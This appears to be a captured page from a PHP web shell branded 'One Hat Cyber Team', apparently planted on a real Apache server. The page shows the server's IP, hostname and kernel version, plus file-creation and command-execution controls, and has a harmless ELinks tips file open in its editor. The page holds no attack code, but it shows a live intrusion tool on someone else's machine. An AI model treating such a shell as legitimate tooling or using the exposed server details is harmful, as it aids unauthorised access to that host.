⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.216
Server IP:
65.21.180.239
Server:
Linux gowhm.eplangoweb.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.0.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
elinks-data
/
examples
/
Edit File: TIPS-AND-TRICKS
Following are user contributed tips and tricks: Poor Man's screen(1) ~or~ "relinks": This will start ELinks on a *new* console if it is not already running, or open the specified URL (if any) in a new tab in the running instance. Save this script as "relinks" or something. Written by Russ, quoting fixed by Miciah. #!/bin/sh elinks -remote ping\(\) 2>/dev/null \ && elinks -remote openURL\(${1:+"${1}"},new-tab\) \ && exit 0 openvt -sw -- elinks ${1:+"${1}"} & deallocvt
Simpan